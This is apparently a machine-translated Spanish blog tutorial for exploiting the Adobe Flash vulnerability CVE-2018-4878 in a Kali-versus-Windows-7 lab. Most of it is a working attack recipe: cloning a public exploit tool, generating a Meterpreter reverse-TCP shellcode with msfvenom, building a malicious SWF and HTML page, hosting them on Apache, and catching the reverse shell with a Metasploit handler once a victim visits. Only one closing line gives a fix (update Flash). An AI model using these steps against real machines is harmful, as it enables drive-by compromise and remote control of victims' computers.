Tutorial de explotación de vulnerabilidades flash CVE-2018-4878


Descripción de la vulnerabilidad

  Esta vulnerabilidad está dirigida a usuarios que han instalado la versión flash 28.0.0.137 o menos. El atacante induce a los usuarios a hacer clic en sitios web maliciosos para obtener directamente permisos de shell.


Versión de impacto

Menor o igual que la versión de Adobe Flash Player 28.0.0.137


Detección de vulnerabilidades

Utilice la herramienta:
https://github.com/anbai-inc/CVE-2018-4878

Coloque index.html y exploit.swf en nuestro propio servidor web y deje que la máquina de destino acceda a ellos. A veces, la computadora puede aparecer y, a veces, el navegador IE se bloquea. Se estima que el script es inestable.

Inserte la descripción de la imagen aquí

Inserte la descripción de la imagen aquí


Explotar

Adobe Flash Player 28.0.0.137 Descarga:
https://pan.baidu.com/s/1Si3PDbR6cGwkGITJUTikYg Código de extracción: p9ok

Máquina de ataque: kali
Máquina de destino: windows7 + Adobe Flash Player 28.0.0.137

Kali primero descarga la herramienta de uso:

git clone https://github.com/anbai-inc/CVE-2018-4878.git
cd CVE-2018-4878

msfvenom 生成 shellcode:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.206.128 lport=4444 -f python>./shellcode.txt

Inserte la descripción de la imagen aquí
Reemplace el shellcode en el texto shellcode.txt con el shellcode en cve-2018-4847.py

Inserte la descripción de la imagen aquí
Continúe modificando la ruta de generación de swf y html (directorio de generación de exp)

Inserte la descripción de la imagen aquí
Ejecute el script para generar exp:

python cve-2018-4878.py 

Inicie apache2:

service apache2 start

Copie exp en el directorio web:

cp exploit.swf /var/www/html/
cp index.html /var/www/html/

supervisión abierta de msf:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.206.128
set lport 4444
run


shell
whoami

Cuando el objetivo visite nuestro html generado, obtendrá permisos de shell

Inserte la descripción de la imagen aquí


Pero más tarde descubrí que a veces no tiene éxito, lo que también causa, por ejemplo, un bloqueo.

Inserte la descripción de la imagen aquí


Fortalecimiento de la vulnerabilidad

Actualizar el complemento flash: https://www.flash.cn/

Supongo que te gusta

Origin blog.csdn.net/weixin_41924764/article/details/109263837
Recomendado
Clasificación